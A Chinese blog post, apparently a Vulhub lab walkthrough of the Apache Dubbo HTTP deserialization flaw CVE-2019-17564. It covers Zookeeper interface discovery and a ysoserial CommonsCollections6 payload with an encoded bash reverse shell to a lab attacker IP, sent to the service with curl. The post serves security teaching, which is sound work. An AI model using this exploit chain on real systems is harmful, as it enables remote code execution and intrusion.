vulhub漏洞复现十二_dubbo

最新推荐文章于 2024-08-16 10:28:20 发布
最新推荐文章于 2024-08-16 10:28:20 发布
阅读量2.2k 收藏
点赞数
文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44193247/article/details/122560293
版权

CVE-2019-17564_Aapche Dubbo Java反序列化漏洞

漏洞原理

Apache Dubbo是一款高性能、轻量级的开源Java RPC服务框架。Dubbo可以使用不同协议通信,当使用http协议时,Apache Dubbo直接使用了Spring框架的`org.springframework.remoting.httpinvoker.HttpInvokerServiceExporter`类做远程调用,而这个过程会读取POST请求的Body并进行反序列化,最终导致漏洞。

在Spring文档中,对`HttpInvokerServiceExporter`有如下描述,并不建议使用:

# WARNING: Be aware of vulnerabilities due to unsafe Java deserialization: Manipulated input streams could lead to unwanted code execution on the server during the deserialization step. As a consequence, do not expose HTTP invoker endpoints to untrusted clients but rather just between your own services. In general, we strongly recommend any other message format (e.g. JSON) instead.

这个漏洞影响Apache Dubbo 2.7.4及以前版本,2.7.5后Dubbo使用`com.googlecode.jsonrpc4j.JsonRpcServer`替换了`HttpInvokerServiceExporter`。

环境搭建

靶  场:192.168.4.10_ubuntu

攻击机:192.168.4.10_kali

执行如下命令启动一个Apache Dubbo 2.7.3 Provider:

#docker-compose up -d

服务启动后,访问`http://your-ip:8080`,服务器默认会返回500错误。

 

漏洞复现

利用该漏洞需要先知道目标RPC接口名,而Dubbo所有的RPC配置储存在registry中,通常使用Zookeeper作为registry。如果能刚好找到目标的Zookeeper未授权访问漏洞,那么就可以在其中找到接口的名称与地址。

1. 连接zookeeper服务器

Vulhub对外开放了8080端口和2181端口,其中2181即为Zookeeper的端口,我们本地下载[Zookeeper](https://zookeeper.apache.org/),使用其中自带的**zkCli**即可连接到这台Zookeeper服务器:

# ./zkCli.sh -server target-ip:2181

 

2. 获取RPC接口名

连接后进入一个交互式控制台,使用`ls`即可列出其中所有节点,包括Dubbo相关的配置:

获取到RPC接口名为`org.vulhub.api.CalcService`。

 

3. 生成payload

直接用ysoserial生成CommonsCollections6的Payload作为POST Body发送到`http://your-ip:8080/org.vulhub.api.CalcService`即可触发反序列化漏洞:(执行代码base64编码)

```

java -jar ysoserial.jar CommonsCollections6 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjQuMjkvOTk5OSAwPiYx}|{base64,-d}|{bash,-i}" > 1.poc

```

 

4. 启动监听

5. 触发漏洞反弹shell

curl -XPOST --data-binary @1.poc http://your-ip:8080/org.vulhub.api.CalcService

 

Revenge_scan
关注
vulhub漏洞复现
qq_30854761的博客
04-26 4168
下载镜像 1 docker pull medicean/vulapps:s_shiro_1 直接运行镜像,将docker的8080端口映射到本地的 8080上 1 docker run -d -p 8080:8080 medicean/vulapps:s_shiro_1 获取复现需要用到的ysoserial工具 若无mvn则自行下载安装 1 2 3 git clone..
spring_dubbo spring_dubbo spring_dubbo
04-18
spring_dubbo spring_dubbospring_dubbospring_dubbospring_dubbospring_dubbospring_dubbospring_dubbospring_dubbospring_dubbospring_dubbospring_dubbospring_dubbospring_dubbospring_dubbospring_dubbospring_...
Vulhub漏洞复现
weixin_45995579的博客
09-30 1764
蔚莱. 1.环境搭建 下载vulhub压缩包,解压到Ubuntu16.04系统下。 进入到Tomcat put 漏洞对应的CVE漏洞编号/vulhub-master/httpd/ssi-rce路径下,执行如下两条命令: docker-compose build docker-compose up -d 网站的配置文件在当前路径下的docker-compose.yml文件内: 【注】:CVE漏洞环境默认开启的端口是8080,当要同时开启多个CVE漏洞环境时需要
shiro550反序列化漏洞原理与漏洞复现(基于vulhub,保姆级的详细教程)_shiro550原理
最新发布
baimao__Ch的博客
08-16 648
如何判断我的服务器是否受到了针对shiro550漏洞的攻击?检查日志:查看系统的日志文件,看是否有异常的访问记录或登录失败记录,如果发现了异常,可以进一步分析该记录是否与Shiro550漏洞有关。检查系统状态:检查系统是否存在异常状态,如系统崩溃、服务宕机等,这可能是攻击者利用Shiro550漏洞进行攻击导致的。检查用户行为:检查是否有用户在短时间内多次尝试登录或者进行异常操作,这可能是攻击者正在利用Shiro550漏洞尝试获取系统权限。
vulhub-漏洞复现(Spring Data Rest 远程命令执行漏洞(CVE-2017-8046))
weixin_45095113的博客
12-08 532
vulhub漏洞复现
Kali 搭建Vulhub靶场 (详细)
qq_43508668的博客
04-21 1628
这里写目录标题安装Docker安装pip安装docker-compose下载Vulhub 安装Docker 检查软件更新 apt-get update 安装https协议、CA证书 apt-get install -y apt-transport-https ca-certificates 安装docker apt install docker.io docker -v 查看是否安装成功 启动docker systemctl start docker 显示docker信息 docker ps -
vulhub漏洞复现1
xhscxj的博客
05-23 1967
CVE-2018-18778 CVE-2018-18778是基于mini_httpd的一个任意文件读取漏洞 Mini_httpd是一个微型的Http服务器,在占用系统资源较小的情况下可以保持一定程度的性能(约为Apache的90%),因此广泛被各类IOT(路由器,交换器,摄像头等)作为嵌入式服务器。而包括华为,zyxel,海康威视,树莓派等在内的厂商的旗下设备都曾采用Mini_httpd组件。 影响版本:ACME mini_httpd before 1.30 分析 当mini_httpd开启虚拟主机时,此
_dubbo-demo1-master_java_dubbo_
10-03
标题中的“_dubbo-demo1-master_java_dubbo_”表明这是一个关于Java Dubbo的示例项目,名为“dubbo-demo1”。Dubbo是中国阿里巴巴开源的一款高性能、轻量级的Java服务治理框架,它主要应用于分布式服务的开发和管理...
dubbo捕获自定义异常_dubbo异常捕获_dubbo异常_自定义异常_捕捉异常_
10-01
在分布式服务框架 Dubbo 中,异常处理是必不可少的一部分。Dubbo 提供了强大的异常处理机制,使得服务提供者能够向消费者传递自定义异常,从而帮助消费者更好地理解和处理服务调用中的错误情况。本文将深入探讨如何...
dubbo-user-book.rar_SOA_dubbo_dubbo-user-book_分布式
09-24
《SOA与Dubbo:深入理解Dubbo用户指南》 在现代企业级应用开发中,Service-Oriented Architecture(SOA)和分布式技术扮演着至关重要的角色。SOA是一种设计原则,它强调将复杂的系统分解为一系列可独立部署、可重用...
Zookeeper和dubbo的搭建准备.rar_dubbo_dubbo admin_sango5o_zookeeper
09-21
zookeeper , dubbo-admin 2.6.3的搭建和建立
vulhub-Struts2-045(CVE-2017-5638)漏洞复现
m0_62008601的博客
07-31 1770
struts2重要漏洞之一
vulhubWeblogic(CVE-2018-2628)漏洞复现
qq_45300786的博客
04-10 2566
一、什么是WebLogic WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。 先提几个概念 JRMP:java remote method protocol,Java远程方法协议 JRMP是的Java技术协议的具
vulhub-spring漏洞复现
qq_51922767的博客
09-14 2671
vulhub-spring漏洞复现
漏洞复现vulhub 中间件漏洞
qq_46421742的博客
08-09 458
tomcat是一个开源而且免费的jsp服务器,默认端口:8080,属于轻量级应用服务器。它可以实现 JavaWeb程序的装载,是配置JSP(Java Server Page)和JAVA系统必备的一款环境。在历史上也披露出来了很多的漏洞,本文讲几个经典的漏洞复现过程。
vulhub漏洞复现-bash(CVE-2014-6271) shellshock-破壳漏洞
weixin_45095113的博客
12-21 457
vulhub漏洞复现-bash(CVE-2014-6271) shellshock-破壳漏洞复现
vulhub靶场漏洞复现
m0_60660067的博客
08-11 341
vulhub靶场,简单漏洞复现
复现vulhub nginx解析漏洞
BBH_FCC的博客
03-16 644
(1)切换目录:cd vulhub-master/nginx/nginx_parsing_vulnerability。(2)docker-compose up -d 启动。(3)访问:http:// 192.168.68.152。(4)上传一个图片,burpsuite抓包。(5)send to repeater,修改数据包,在末尾添加
漏洞复现——vulhub中的SSRF漏洞
qq_52666132的博客
07-07 1312
vulhub中ssrf漏洞复现
dubbo配置调用本地_Dubbo 本地调用
05-30
Dubbo框架本身支持本地调用,只需要在Dubbo配置文件中将注册中心的地址设置为`injvm`即可。以下是一个示例Dubbo配置文件,其中使用了`injvm`作为注册中心的地址: ```xml <dubbo:application name="demo-provider" /> <dubbo:registry protocol="injvm" /> <dubbo:protocol name="dubbo" port="20880" /> <dubbo:service interface="com.example.demo.service.DemoService" ref="demoServiceImpl" /> ``` 在这个配置文件中,`<dubbo:registry protocol="injvm" />`指定了注册中心的地址为`injvm`,表示使用本地注册中心。当服务消费者和服务提供者在同一个JVM进程中时,Dubbo会自动选择本地调用,从而提高调用效率。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值